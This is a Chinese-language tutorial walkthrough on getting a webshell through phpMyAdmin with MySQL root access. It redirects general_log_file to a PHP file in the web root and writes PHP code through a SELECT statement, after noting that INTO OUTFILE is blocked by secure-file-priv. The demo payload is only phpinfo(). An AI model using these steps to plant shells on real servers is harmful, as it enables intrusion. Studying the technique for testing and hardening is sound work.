2017-04-11

phpMyAdmin getshell

环境

Win XP
Apache 2.0
PHP 5.3.29
MySQL 5.0.8-dev

条件：
拥有MySQL的root权限

漏洞测试

首先我们以root登陆phpMyAdmin
试一下利用OUT INTOFILE来getshell

请输入图片描述

执行以上语句，会发现已经写入了小马

请输入图片描述

因为我用的mysql 版本较低，所以可以写马，如果mysql版本在5.7.6以上，则会出现错误

#1290 - The MySQL server is running with the --secure-file-priv option so it cannot execute this statement.

原因是 mysql中有一个全局变量secure-file-priv，这个变量默认参数为NULL，只要在my.ini中添加一行secure-file-priv=’路径’即可

那么如果网站这样做了，将OUT INTOFILE禁用了，我们该怎样getshell呢

利用的就是MySQL 5.0+版本会自动创建日志文件，所以可以修改全局变量来变动文件位置，但是日志生成的目录要有可读可写的权限。

首先要了解两个MySQL的全局变量

general_log 是日志保存状态 ON/OFF 开启后将保存每一条执行的SQL语句到文件中
general_log_file 是日志的保存路径

首先查看下全局变量：

请输入图片描述

目前为OFF状态，将他修改为ON

SET GLOBAL general_log='ON'

查看目录发现一个新文件被创建
内容如下

MySQLa, Version: 5.5.40 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL Time Id Command
Argument 170411 16:02:58 17 Quit
18 Connect root@localhost on
18 Query SET CHARACTER SET ‘utf8’
18 Query SET collation_connection = ‘utf8_general_ci’
18 Init DB mysql
18 Query SHOW MASTER LOGS
18 Query SELECT USER()
18 Quit
19 Connect root@localhost on
19 Query SET CHARACTER SET ‘utf8’
19 Query SET collation_connection = ‘utf8_general_ci’
19 Query SHOW DATABASES
19 Quit 170411 16:02:59 20 Connect root@localhost on
20 Query SET CHARACTER SET ‘utf8’
20 Query SET collation_connection = ‘utf8_general_ci’
20 Quit
21 Connect root@localhost on
21 Query SET CHARACTER SET ‘utf8’
21 Query SET collation_connection = ‘utf8_general_ci’
21 Quit

然后我们执行一条语句

SELECT MD5('admin')

再打开文件

MySQLa, Version: 5.5.40 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL Time Id Command
Argument 170411 16:02:58 17 Quit
18 Connect root@localhost on
18 Query SET CHARACTER SET ‘utf8’
18 Query SET collation_connection = ‘utf8_general_ci’
18 Init DB mysql
18 Query SHOW MASTER LOGS
18 Query SELECT USER()
18 Quit
19 Connect root@localhost on
19 Query SET CHARACTER SET ‘utf8’
19 Query SET collation_connection = ‘utf8_general_ci’
19 Query SHOW DATABASES
19 Quit 170411 16:02:59 20 Connect root@localhost on
20 Query SET CHARACTER SET ‘utf8’
20 Query SET collation_connection = ‘utf8_general_ci’
20 Quit
21 Connect root@localhost on
21 Query SET CHARACTER SET ‘utf8’
21 Query SET collation_connection = ‘utf8_general_ci’
21 Quit 170411 16:04:49 22 Connect root@localhost on
22 Query SET CHARACTER SET ‘utf8’
22 Query SET collation_connection = ‘utf8_general_ci’
22 Init DB mysql
22 Query SHOW MASTER LOGS
22 Quit
23 Connect root@localhost on
23 Query SET CHARACTER SET ‘utf8’
23 Query SET collation_connection = ‘utf8_general_ci’
23 Quit 170411 16:05:06 24 Connect root@localhost on
24 Query SET CHARACTER SET ‘utf8’
24 Query SET collation_connection = ‘utf8_general_ci’
24 Query SELECT MD5(‘admin’)
24 Init DB mysql
24 Query SHOW MASTER LOGS
24 Quit 170411 16:05:07 25 Connect root@localhost on
25 Query SET CHARACTER SET ‘utf8’
25 Query SET collation_connection = ‘utf8_general_ci’
25 Quit

既然可以写，那么就好办了，我们可以直接写shell

SET GLOBAL general_log_file='C:/www/1.php'

请输入图片描述

1.php被创建，然后我们就可以往里写shell了

SELECT '<?php phpinfo(); ?>'

请输入图片描述